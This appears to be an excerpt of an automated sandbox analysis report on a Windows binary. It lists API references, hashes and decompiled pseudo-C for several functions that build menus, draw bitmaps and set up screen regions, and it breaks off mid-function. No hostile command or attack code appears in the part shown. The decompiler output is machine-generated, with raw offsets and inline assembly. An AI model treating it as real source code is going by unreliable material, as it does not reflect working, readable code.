0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d3f4da
0x00d3f4e0
0x00d3f4f1
0x00d3f4f7
0x00d3f4fa
0x00d3f518
0x00d3f51c
0x00d3f522
0x00d3f52e
0x00d3f534
0x00d3f537
0x00d3f539
0x00d3f53f
0x00d3f542
0x00d3f544
0x00d3f549
0x00d3f550
0x00d3f560
0x00d3f569
0x00d3f57d
0x00d3f583
0x00d3f594
0x00d3f599
0x00d3f59d
0x00d3f5a2
0x00d3f5a5
0x00d3f5a5
0x00d3f544
0x00d3f5b3
0x00d3f5b5
0x00d3f5bd
0x00d3f5bd
0x00d3f5c3
0x00d3f5c9
0x00d3f5cb
0x00d3f5d1
0x00d3f5d4
0x00d3f5e6
0x00d3f5e8
0x00d3f5ec
0x00d3f5ed
0x00d3f5ef
0x00d3f5f4
0x00d3f5ff
0x00d3f60b
0x00d3f614
0x00d3f628
0x00d3f62e
0x00d3f63f
0x00d3f644
0x00d3f648
0x00d3f64d
0x00d3f650
0x00d3f650
0x00d3f655
0x00d3f65d
0x00d3f65d
0x00d3f5cb
0x00d3f66a
0x00d3f677
0x00d3f685
0x00d3f685
0x00d3f69c
0x00d3f69c
0x00d3f6a8
0x00d3f6b2
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00D3EFF7
IsWindow.USER32(?), ref: 00D3F093
GetMenuItemCount.USER32 ref: 00D3F23E
AppendMenuA.USER32 ref: 00D3F272
SendMessageA.USER32(?,0000040C,00000000,00000000), ref: 00D3F2FE
SendMessageA.USER32(?,0000041D,00000000,?), ref: 00D3F33C
GetMenuItemCount.USER32 ref: 00D3F3BB
AppendMenuA.USER32 ref: 00D3F3D1
AppendMenuA.USER32 ref: 00D3F3EF
GetMenuItemCount.USER32 ref: 00D3F45E
AppendMenuA.USER32 ref: 00D3F474
AppendMenuA.USER32 ref: 00D3F48E
AppendMenuA.USER32 ref: 00D3F254

Part of subcall function 00CB7697: GetDlgCtrlID.USER32 ref: 00CB76A2

GetWindow.USER32(?,00000005), ref: 00D3F512
AppendMenuA.USER32 ref: 00D3F57D
GetWindow.USER32(00000000,00000002), ref: 00D3F5AD
AppendMenuA.USER32 ref: 00D3F628
GetMenuItemCount.USER32 ref: 00D3F66F
AppendMenuA.USER32 ref: 00D3F685
AppendMenuA.USER32 ref: 00D3F69C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Menu$Append$CountItem$Window$MessageSend$CtrlH_prolog3_
String ID:
API String ID: 528922254-0
Opcode ID: 9090cbe00f15c66a7838cacf484107463b26755402332f9b7672374338ad4f92
Instruction ID: d67b3b9c070d43cc60934486f3ef6e0e679a2af5fd35493cb762f1b86dbbdc34
Opcode Fuzzy Hash: 9090cbe00f15c66a7838cacf484107463b26755402332f9b7672374338ad4f92
Instruction Fuzzy Hash: AB126B35A042199FDF249F64CC45BAD7BB6AF48714F1480A9E849A72A2DF30AE40DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB9546 Relevance: 30.3, APIs: 20, Instructions: 265
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00CB9546(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HBRUSH__* _t141;
				intOrPtr _t147;
				void* _t149;
				int _t154;
				intOrPtr _t155;
				void* _t162;
				void* _t170;
				int _t174;
				intOrPtr _t204;
				void* _t206;
				intOrPtr _t207;
				void* _t211;

				_t200 = __edx;
				_push(0x78);
				E00DDD55F(0xe08b1c, __ebx, __edi, __esi);
				_t204 =  *((intOrPtr*)(_t211 + 8));
				_t174 = 0;
				_t202 =  *((intOrPtr*)(_t211 + 0xc));
				 *((intOrPtr*)(_t211 - 0x4c)) = _t204;
				 *((intOrPtr*)(_t211 - 0x48)) = 0xe19718;
				 *(_t211 - 0x44) = 0;
				 *((intOrPtr*)(_t211 - 0x40)) = 0;
				 *((intOrPtr*)(_t211 - 0x3c)) = 0;
				 *((intOrPtr*)(_t211 - 4)) = 0;
				 *((intOrPtr*)(_t211 - 0x5c)) = 0xe19718;
				 *(_t211 - 0x58) = 0;
				 *((intOrPtr*)(_t211 - 0x54)) = 0;
				 *((intOrPtr*)(_t211 - 0x50)) = 0;
				 *((intOrPtr*)(_t211 - 0x38)) = 0xe19718;
				 *(_t211 - 0x34) = 0;
				 *((intOrPtr*)(_t211 - 0x30)) = 0;
				 *((intOrPtr*)(_t211 - 0x2c)) = 0;
				 *(_t211 - 0x24) = 0;
				 *((intOrPtr*)(_t211 - 0x28)) = 0xe196b4;
				 *(_t211 - 0x78) = 0;
				 *((intOrPtr*)(_t211 - 0x7c)) = 0xe1966c;
				 *((char*)(_t211 - 4)) = 4;
				if(E00CB9B84(0, _t211 - 0x48, CreateCompatibleDC(0)) != 0 && E00CB9B84(0, _t211 - 0x5c, CreateCompatibleDC(0)) != 0 && E00CB9B84(0, _t211 - 0x38, CreateCompatibleDC(0)) != 0 && GetObjectA( *(_t204 + 4), 0x18, _t211 - 0x74) != 0) {
					E00CB9CCD(_t202);
					if(E00CB9BC6(0, _t202, _t202, CreateBitmap( *(_t211 - 0x70),  *(_t211 - 0x6c),  *(_t211 - 0x64) & 0x0000ffff,  *(_t211 - 0x62) & 0x0000ffff, 0)) != 0) {
						E00CB9BC6(0, _t211 - 0x28, _t202, CreateBitmap(8, 8, 1, 1, 0xe19a2c));
						_t141 = CreatePatternBrush( *(_t211 - 0x24));
						_t188 = _t211 - 0x7c;
						E00CB9BC6(0, _t211 - 0x7c, _t202, _t141);
						_t206 =  *(_t211 - 0x24);
						_t218 = _t206;
						if(_t206 != 0) {
							_push(0);
							_t170 = E00CBA705(0, _t188, __edx, _t202, _t206, _t218);
							if(_t170 != 0) {
								_t36 = _t170 + 0x1c; // 0x1c
								E00CAF9B5(_t36, __edx,  *(_t211 - 0x24));
							}
							 *(_t211 - 0x24) = _t174;
							DeleteObject(_t206);
						}
						E00CB9BC6(_t174, _t211 - 0x28, _t202, CreateBitmap( *(_t211 - 0x70),  *(_t211 - 0x6c), 1, 1, _t174));
						_t207 = E00CBA251( *(_t211 - 0x44),  *( *((intOrPtr*)(_t211 - 0x4c)) + 4));
						 *((intOrPtr*)(_t211 - 0x84)) = _t207;
						_t147 = E00CBA251( *(_t211 - 0x58),  *(_t211 - 0x24));
						 *((intOrPtr*)(_t211 - 0x80)) = _t147;
						if(_t207 != 0 && _t147 != 0) {
							_t149 = E00CBA37B(_t211 - 0x48, _t200, GetPixel( *(_t211 - 0x44), _t174, _t174));
							BitBlt( *(_t211 - 0x58), _t174, _t174,  *(_t211 - 0x70),  *(_t211 - 0x6c),  *(_t211 - 0x44), _t174, _t174, 0xcc0020);
							E00CBA37B(_t211 - 0x48, _t200, 0xffffff);
							BitBlt( *(_t211 - 0x58), _t174, _t174,  *(_t211 - 0x70),  *(_t211 - 0x6c),  *(_t211 - 0x44), _t174, _t174, 0xee0086);
							E00CBA37B(_t211 - 0x48, _t200, _t149);
							_t154 = _t174;
							if(_t202 != 0) {
								_t154 =  *(_t202 + 4);
							}
							_t155 = E00CBA251( *(_t211 - 0x34), _t154);
							 *((intOrPtr*)(_t211 - 0x4c)) = _t155;
							if(_t155 != 0) {
								_t202 = E00CBA4ED(_t211 - 0x38, _t200,  *((intOrPtr*)(_t211 + 0x10)));
								_t162 = E00CBA37B(_t211 - 0x38, _t200,  *((intOrPtr*)(_t211 + 0x14)));
								 *(_t211 - 0x18) =  *(_t211 - 0x70);
								 *(_t211 - 0x20) = _t174;
								 *(_t211 - 0x1c) = _t174;
								 *(_t211 - 0x14) =  *(_t211 - 0x6c);
								FillRect( *(_t211 - 0x34), _t211 - 0x20,  *(_t211 - 0x78));
								E00CBA4ED(_t211 - 0x38, _t200, _t161);
								E00CBA37B(_t211 - 0x38, _t200, _t162);
								BitBlt( *(_t211 - 0x34), _t174, _t174,  *(_t211 - 0x70),  *(_t211 - 0x6c),  *(_t211 - 0x44), _t174, _t174, 0x660046);
								BitBlt( *(_t211 - 0x34), _t174, _t174,  *(_t211 - 0x70),  *(_t211 - 0x6c),  *(_t211 - 0x58), _t174, _t174, 0x8800c6);
								BitBlt( *(_t211 - 0x34), _t174, _t174,  *(_t211 - 0x70),  *(_t211 - 0x6c),  *(_t211 - 0x44), _t174, _t174, 0x660046);
								_t174 =  *( *((intOrPtr*)(_t211 - 0x4c)) + 4);
							}
							E00CBA251( *(_t211 - 0x34), _t174);
							E00CBA251( *(_t211 - 0x58),  *((intOrPtr*)( *((intOrPtr*)(_t211 - 0x80)) + 4)));
							E00CBA251( *(_t211 - 0x44),  *((intOrPtr*)( *((intOrPtr*)(_t211 - 0x84)) + 4)));
						}
					}
				}
				 *((intOrPtr*)(_t211 - 0x7c)) = 0xe1966c;
				E00CB91F0(_t211 - 0x7c, _t200);
				 *((intOrPtr*)(_t211 - 0x28)) = 0xe196b4;
				E00CB91F0(_t211 - 0x28, _t200);
				 *((char*)(_t211 - 4)) = 8;
				 *((intOrPtr*)(_t211 - 0x38)) = 0xe19718;
				if( *(_t211 - 0x34) != 0) {
					DeleteDC(E00CB9CE3(_t211 - 0x38));
				}
				 *((char*)(_t211 - 4)) = 9;
				 *((intOrPtr*)(_t211 - 0x5c)) = 0xe19718;
				if( *(_t211 - 0x58) != 0) {
					DeleteDC(E00CB9CE3(_t211 - 0x5c));
				}
				 *((intOrPtr*)(_t211 - 4)) = 0xa;
				 *((intOrPtr*)(_t211 - 0x48)) = 0xe19718;
				if( *(_t211 - 0x44) != 0) {
					DeleteDC(E00CB9CE3(_t211 - 0x48));
				}
				return E00DDD50E(_t174, _t202, 0xe19718);
			}

0x00cb9546
0x00cb9546
0x00cb954d
0x00cb9552
0x00cb9555
0x00cb9557
0x00cb955f
0x00cb9562
0x00cb9565
0x00cb9568
0x00cb956b
0x00cb956e
0x00cb9571
0x00cb9574
0x00cb9577
0x00cb957a
0x00cb957d
0x00cb9580
0x00cb9583
0x00cb9586
0x00cb9589
0x00cb958c
0x00cb9593
0x00cb9596
0x00cb959e
0x00cb95b3
0x00cb9602
0x00cb9628
0x00cb9645
0x00cb964d
0x00cb9654
0x00cb9657
0x00cb965c
0x00cb965f
0x00cb9661
0x00cb9663
0x00cb9664
0x00cb966b
0x00cb9670
0x00cb9673
0x00cb9673
0x00cb9679
0x00cb967c
0x00cb967c
0x00cb9697
0x00cb96ad
0x00cb96b2
0x00cb96b8
0x00cb96bd
0x00cb96c2
0x00cb96df
0x00cb96fb
0x00cb9709
0x00cb9723
0x00cb972d
0x00cb9732
0x00cb9736
0x00cb9738
0x00cb9738
0x00cb973f
0x00cb9744
0x00cb9749
0x00cb9760
0x00cb9762
0x00cb9772
0x00cb977c
0x00cb977f
0x00cb9782
0x00cb9785
0x00cb978f
0x00cb9798
0x00cb97b3
0x00cb97ce
0x00cb97e5
0x00cb97ee
0x00cb97ee
0x00cb97f5
0x00cb9803
0x00cb9814
0x00cb9814
0x00cb96c2
0x00cb9628
0x00cb981c
0x00cb9823
0x00cb982b
0x00cb9832
0x00cb9840
0x00cb9844
0x00cb9847
0x00cb9852
0x00cb9852
0x00cb985c
0x00cb9860
0x00cb9863
0x00cb986e
0x00cb986e
0x00cb9878
0x00cb987f
0x00cb9882
0x00cb988d
0x00cb988d
0x00cb9898

APIs

__EH_prolog3_GS.LIBCMT ref: 00CB954D
CreateCompatibleDC.GDI32(00000000), ref: 00CB95A2
CreateCompatibleDC.GDI32(00000000), ref: 00CB95BA
CreateCompatibleDC.GDI32(00000000), ref: 00CB95D2
GetObjectA.GDI32(00000004,00000018,?), ref: 00CB95F2
CreateBitmap.GDI32(?,?,?,?,00000000), ref: 00CB9618
CreateBitmap.GDI32(00000008,00000008,00000001,00000001,00E19A2C), ref: 00CB963B
CreatePatternBrush.GDI32(?), ref: 00CB964D
DeleteObject.GDI32(?), ref: 00CB967C
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00CB968D
GetPixel.GDI32(?,00000000,00000000), ref: 00CB96D5
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00CB96FB
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 00CB9723
FillRect.USER32 ref: 00CB9785

Part of subcall function 00CBA705: __EH_prolog3.LIBCMT ref: 00CBA70C

BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00CB97B3
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 00CB97CE
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00CB97E5
DeleteDC.GDI32(00000000), ref: 00CB9852
DeleteDC.GDI32(00000000), ref: 00CB986E
DeleteDC.GDI32(00000000), ref: 00CB988D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Create$Delete$BitmapCompatible$Object$BrushFillH_prolog3H_prolog3_PatternPixelRect
String ID:
API String ID: 308707564-0
Opcode ID: 651aa95ba238eb294695e9d9cb3b71c9040f8b2a2d95e09200e3d87473c4e8dd
Instruction ID: f9d942761b09a3ce29a47fe66787fe88981f676ddbe98705e693f93c4fb12ffe
Opcode Fuzzy Hash: 651aa95ba238eb294695e9d9cb3b71c9040f8b2a2d95e09200e3d87473c4e8dd
Instruction Fuzzy Hash: 1CB1E2B1D01208AFDF119FA1DD85AEEBBB9FF08740F148029FA55B6161CA325E45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CDCF04 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00CDCF04(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, signed long long __fp0) {
				void* _t144;
				signed int _t151;
				void* _t155;
				signed int _t156;
				signed int _t158;
				signed int _t173;
				void* _t174;
				void* _t182;
				unsigned int _t184;
				signed int _t193;
				intOrPtr _t201;
				signed char* _t203;
				signed int _t210;
				intOrPtr _t212;
				unsigned int _t221;
				signed int _t226;
				int _t233;
				signed int _t237;
				void* _t238;
				signed long long* _t239;
				signed long long _t248;
				signed long long _t251;

				_t248 = __fp0;
				_t235 = __esi;
				_push(0x100);
				E00DDD55F(0xe0a87b, __ebx, __edi, __esi);
				_t201 = __ecx;
				 *((intOrPtr*)(_t238 - 0xb8)) = __ecx;
				_t233 = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 1;
				 *((intOrPtr*)(__ecx + 0xc)) =  *((intOrPtr*)(_t238 + 8));
				if( *((intOrPtr*)(__ecx + 0x8c)) == 0 ||  *((intOrPtr*)(E00CC19ED() + 0x1ac)) <= 8) {
					__eflags = 1;
				} else {
					E00CB9032(_t238 - 0xcc);
					 *((intOrPtr*)(_t238 - 4)) = 0;
					E00CB9B84(_t201, _t238 - 0xcc, CreateCompatibleDC(0));
					if(GetObjectA( *(_t201 + 0x8c), 0x18, _t238 - 0x10c) != 0) {
						 *(_t238 - 0xa8) =  *(_t238 - 0x108);
						 *(_t238 - 0xb0) =  *(_t238 - 0x104);
						_t144 =  *(_t201 + 0x8c);
						if(_t144 != 0) {
							_t235 = SelectObject( *(_t238 - 0xc8), _t144);
							 *(_t238 - 0x98) = _t235;
							if(_t235 != 0) {
								E00CB9032(_t238 - 0xe4);
								 *((char*)(_t238 - 4)) = 1;
								E00CB9B84(_t201, _t238 - 0xe4, CreateCompatibleDC( *(_t238 - 0xc8)));
								_t210 =  *(_t238 - 0xa8);
								_t151 =  *(_t238 - 0xb0);
								 *(_t238 - 0x34) = _t151;
								 *((short*)(_t238 - 0x30)) = 1;
								_t226 = 0x20;
								 *(_t238 - 0x28) = _t151 * _t210;
								 *(_t238 - 0x3c) = 0x28;
								 *(_t238 - 0x38) = _t210;
								 *(_t238 - 0x2e) = _t226;
								 *((intOrPtr*)(_t238 - 0x2c)) = 0;
								 *((intOrPtr*)(_t238 - 0x24)) = 0;
								 *((intOrPtr*)(_t238 - 0x20)) = 0;
								 *((intOrPtr*)(_t238 - 0x1c)) = 0;
								 *((intOrPtr*)(_t238 - 0x18)) = 0;
								 *(_t238 - 0xd0) = 0;
								_t155 = CreateDIBSection( *(_t238 - 0xe0), _t238 - 0x3c, 0, _t238 - 0xd0, 0, 0);
								 *(_t238 - 0x9c) = _t155;
								if(_t155 != 0) {
									_t156 = SelectObject( *(_t238 - 0xe0), _t155);
									 *(_t238 - 0xd4) = _t156;
									__eflags = _t156;
									if(_t156 != 0) {
										BitBlt( *(_t238 - 0xe0), 0, 0,  *(_t238 - 0xa8),  *(_t238 - 0xb0),  *(_t238 - 0xc8), 0, 0, 0xcc0020);
										_t158 =  *(_t201 + 0xc);
										 *(_t238 - 0xa0) = _t158;
										__eflags = _t158;
										if(_t158 <= 0) {
											_t158 = 0x82;
											 *(_t238 - 0xa0) = 0x82;
										}
										__eflags =  *((intOrPtr*)(_t201 + 8)) - 0x20;
										 *(_t238 - 0x94) = _t158;
										if( *((intOrPtr*)(_t201 + 8)) != 0x20) {
											E00D0A290(_t238 - 0xbc, _t238 - 0xe4);
											_t212 =  *((intOrPtr*)(_t201 + 0xa8));
											 *((char*)(_t238 - 4)) = 2;
											__eflags = _t212 - 0xffffffff;
											if(__eflags == 0) {
												_t212 =  *((intOrPtr*)(E00CC19ED() + 0x1c));
											}
											_push(0xffffffff);
											_push(_t212);
											_push( *(_t238 - 0xa0));
											 *((intOrPtr*)(_t238 - 0xf4)) = _t233;
											 *((intOrPtr*)(_t238 - 0xf0)) = _t233;
											 *(_t238 - 0xec) =  *(_t238 - 0xa8);
											 *(_t238 - 0xe8) =  *(_t238 - 0xb0);
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											E00D0A2A5(L00D0CBD6(_t201, _t238 - 0xbc, _t239 - 0x10, _t238 - 0xf4, __eflags, _t248), _t238 - 0xbc);
											goto L22;
										} else {
											_t173 = GetObjectA( *(_t238 - 0x9c), 0x54, _t238 - 0x90);
											__eflags = _t173;
											if(_t173 != 0) {
												_t174 = 0x20;
												__eflags =  *((intOrPtr*)(_t238 - 0x7e)) - _t174;
												if( *((intOrPtr*)(_t238 - 0x7e)) == _t174) {
													__eflags =  *(_t238 - 0x7c);
													if( *(_t238 - 0x7c) != 0) {
														__eflags =  *(_t238 - 0x88) *  *(_t238 - 0x8c);
														if( *(_t238 - 0x88) *  *(_t238 - 0x8c) > 0) {
															asm("fild dword [ebp-0x94]");
															 *(_t238 - 0x98) = _t235;
															 *(_t238 - 0x94) = 0xff;
															 *(_t238 - 0xa4) = _t248;
															_t250 =  *(_t238 - 0xa4) *  *0xe19cb0;
															_t203 =  *(_t238 - 0x7c) + 2;
															__eflags = _t203;
															 *(_t238 - 0xa4) =  *(_t238 - 0xa4) *  *0xe19cb0;
															do {
																_t182 = L00D0DE87(_t250, (( *(_t203 - 2) & 0x000000ff) << 0x00000008 |  *(_t203 - 1) & 0x000000ff) << 0x00000008 |  *_t203 & 0x000000ff, _t238 - 0xac, _t238 - 0xec, _t238 - 0xb4);
																_t251 =  *(_t238 - 0xa4);
																_t239 = _t239 - 0x30;
																asm("fst qword [esp+0x28]");
																asm("fst qword [esp+0x20]");
																_t239[3] = _t251;
																asm("fldz");
																_t239[2] = _t251;
																_t239[1] =  *(_t238 - 0xb4);
																_t250 =  *(_t238 - 0xac);
																 *_t239 =  *(_t238 - 0xac);
																_push(E00D0CEE0(_t182, _t226));
																_t184 = E00D0DBA0((( *(_t203 - 2) & 0x000000ff) << 0x00000008 |  *(_t203 - 1) & 0x000000ff) << 0x00000008 |  *_t203 & 0x000000ff, __eflags);
																_t237 = _t203[1] & 0x000000ff;
																_t221 = _t184;
																 *_t203 = (_t221 & 0x000000ff) * _t237 /  *(_t238 - 0x94);
																_t203 =  &(_t203[4]);
																 *((char*)(_t203 - 5)) = ((_t221 & 0x0000ffff) >> 8) * _t237 /  *(_t238 - 0x94);
																_t193 = (_t221 >> 0x00000010 & 0x000000ff) * _t237;
																_t226 = _t193 % 0xff;
																_t233 = _t233 + 1;
																 *((char*)(_t203 - 6)) = _t193 / 0xff;
																__eflags = _t233 -  *(_t238 - 0x88) *  *(_t238 - 0x8c);
															} while (_t233 <  *(_t238 - 0x88) *  *(_t238 - 0x8c));
															_t201 =  *((intOrPtr*)(_t238 - 0xb8));
															L22:
															_t235 =  *(_t238 - 0x98);
														}
														SelectObject( *(_t238 - 0xe0),  *(_t238 - 0xd4));
														SelectObject( *(_t238 - 0xc8), _t235);
														DeleteObject( *(_t201 + 0x8c));
														 *(_t201 + 0x8c) =  *(_t238 - 0x9c);
														__eflags = 0;
														_t233 = 1;
													}
												}
											}
										}
									} else {
										SelectObject( *(_t238 - 0xc8), _t235);
										DeleteObject( *(_t238 - 0x9c));
									}
								} else {
									SelectObject( *(_t238 - 0xc8), _t235);
								}
								E00CB91A4(_t238 - 0xe4);
							}
						}
					}
					E00CB91A4(_t238 - 0xcc);
				}
				return E00DDD50E(_t201, _t233, _t235);
			}

0x00cdcf04
0x00cdcf04
0x00cdcf04
0x00cdcf0e
0x00cdcf13
0x00cdcf15
0x00cdcf1d
0x00cdcf20
0x00cdcf26
0x00cdcf2f
0x00cdd30c
0x00cdcf47
0x00cdcf4d
0x00cdcf53
0x00cdcf63
0x00cdcf7f
0x00cdcf8b
0x00cdcf97
0x00cdcf9d
0x00cdcfa5
0x00cdcfb8
0x00cdcfba
0x00cdcfc2
0x00cdcfce
0x00cdcfdc
0x00cdcfec
0x00cdcff1
0x00cdcff9
0x00cdd002
0x00cdd008
0x00cdd00c
0x00cdd00f
0x00cdd01d
0x00cdd02b
0x00cdd02e
0x00cdd032
0x00cdd035
0x00cdd038
0x00cdd03b
0x00cdd03e
0x00cdd041
0x00cdd047
0x00cdd04d
0x00cdd055
0x00cdd070
0x00cdd076
0x00cdd07c
0x00cdd07e
0x00cdd0bf
0x00cdd0c5
0x00cdd0c8
0x00cdd0ce
0x00cdd0d0
0x00cdd0d2
0x00cdd0d7
0x00cdd0d7
0x00cdd0dd
0x00cdd0e1
0x00cdd0e7
0x00cdd240
0x00cdd245
0x00cdd24b
0x00cdd24f
0x00cdd252
0x00cdd259
0x00cdd259
0x00cdd268
0x00cdd26a
0x00cdd26b
0x00cdd271
0x00cdd27d
0x00cdd286
0x00cdd294
0x00cdd29a
0x00cdd29b
0x00cdd29c
0x00cdd29d
0x00cdd2a9
0x00000000
0x00cdd0ed
0x00cdd0fc
0x00cdd102
0x00cdd104
0x00cdd10c
0x00cdd10d
0x00cdd111
0x00cdd117
0x00cdd11b
0x00cdd12e
0x00cdd130
0x00cdd136
0x00cdd13c
0x00cdd142
0x00cdd14c
0x00cdd158
0x00cdd161
0x00cdd161
0x00cdd164
0x00cdd16a
0x00cdd195
0x00cdd19a
0x00cdd1a0
0x00cdd1a3
0x00cdd1a7
0x00cdd1ab
0x00cdd1af
0x00cdd1b1
0x00cdd1bb
0x00cdd1bf
0x00cdd1c5
0x00cdd1cd
0x00cdd1ce
0x00cdd1d3
0x00cdd1d7
0x00cdd1e9
0x00cdd1eb
0x00cdd202
0x00cdd20d
0x00cdd210
0x00cdd212
0x00cdd213
0x00cdd223
0x00cdd223
0x00cdd22b
0x00cdd2ae
0x00cdd2ae
0x00cdd2ae
0x00cdd2c0
0x00cdd2cd
0x00cdd2d9
0x00cdd2e5
0x00cdd2eb
0x00cdd2ed
0x00cdd2ed
0x00cdd11b
0x00cdd111
0x00cdd104
0x00cdd080
0x00cdd087
0x00cdd093
0x00cdd093
0x00cdd057
0x00cdd05e
0x00cdd05e
0x00cdd2f6
0x00cdd2f6
0x00cdcfc2
0x00cdcfa5
0x00cdd301
0x00cdd306
0x00cdd312

APIs

__EH_prolog3_GS.LIBCMT ref: 00CDCF0E
CreateCompatibleDC.GDI32(00000000), ref: 00CDCF56
GetObjectA.GDI32(?,00000018,?), ref: 00CDCF77
SelectObject.GDI32(?,?), ref: 00CDCFB2
CreateCompatibleDC.GDI32(?), ref: 00CDCFDF
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00CDD047
SelectObject.GDI32(?,00000000), ref: 00CDD05E
SelectObject.GDI32(?,00000000), ref: 00CDD070
SelectObject.GDI32(?,00000000), ref: 00CDD087
DeleteObject.GDI32(?), ref: 00CDD093

Strings

(, xrefs: 00CDD01D
, xrefs: 00CDD0DD

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$Select$Create$Compatible$DeleteH_prolog3_Section
String ID: $(
API String ID: 1429849173-55695022
Opcode ID: a95c496b9227e75a56371ab74d4e453c687001c62c5c5b7e126081d97c07ebb9
Instruction ID: 7c1e7fb78f0552761262635803aad06f5cfb0d654581c92042f369548ba804f9
Opcode Fuzzy Hash: a95c496b9227e75a56371ab74d4e453c687001c62c5c5b7e126081d97c07ebb9
Instruction Fuzzy Hash: AFB1F8709002699FDB24DF65DC85BEEBBB5EF45300F0081EAE999A6251DB309E84DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0777 Relevance: 28.7, APIs: 19, Instructions: 240
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CC0777(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, RECT* _a8, signed int _a12, signed int _a16, RECT* _a20, signed int _a24, signed int _a28, struct HRGN__* _a32, struct HRGN__* _a36) {
				char _v4;
				struct tagRECT _v32;
				struct HRGN__* _v36;
				struct HRGN__* _v40;
				int _v44;
				char _v48;
				signed int _v52;
				struct tagRECT _v68;
				char _v72;
				int _v76;
				char _v80;
				struct HRGN__* _t133;
				char* _t138;
				void* _t144;
				void* _t160;
				signed int _t185;
				int _t193;
				intOrPtr* _t196;
				char* _t202;
				intOrPtr _t233;
				void* _t237;
				struct HRGN__* _t238;
				RECT* _t240;
				RECT* _t242;
				struct HRGN__* _t243;
				char* _t249;
				void* _t250;
				signed int _t252;
				signed int _t254;

				_t237 = __edx;
				_push(0x44);
				E00DDD55F(0xe08ed4, __ebx, __edi, __esi);
				_t196 = __ecx;
				_t242 = _a8;
				_t240 = _a20;
				_v40 = _a32;
				_v36 = _a36;
				_v76 = 0;
				_v80 = 0xe1a644;
				_v4 = 0;
				_v68.left = 0;
				_v72 = 0xe1a644;
				_v68.right = 0;
				_v68.top = 0xe1a644;
				_v4 = 2;
				E00CB9BC6(__ecx,  &_v72, _t240, CreateRectRgnIndirect(_t242));
				CopyRect( &_v32, _t242);
				InflateRect( &_v32,  ~_a12,  ~_a16);
				IntersectRect( &_v32,  &_v32, _t242);
				E00CB9BC6(_t196,  &(_v68.top), _t240, CreateRectRgnIndirect( &_v32));
				_t133 = CreateRectRgn(0, 0, 0, 0);
				_t202 =  &_v80;
				E00CB9BC6(_t196, _t202, _t240, _t133);
				CombineRgn(_v76, _v68.left, _v68.right, 3);
				_t243 = _v40;
				_t258 = _t243;
				if(_t243 != 0) {
					L2:
					if(_v36 == 0) {
						_v36 = _t243;
					}
					_v52 = 0;
					_v68.bottom = 0xe1a644;
					_v44 = 0;
					_v48 = 0xe1a644;
					_v4 = 4;
					if(_t240 != 0) {
						E00CB9BC6(_t196,  &(_v68.bottom), _t240, CreateRectRgn(0, 0, 0, 0));
						SetRectRgn(_v68.left,  *_t240, _t240->top, _t240->right, _t240->bottom);
						CopyRect( &_v32, _t240);
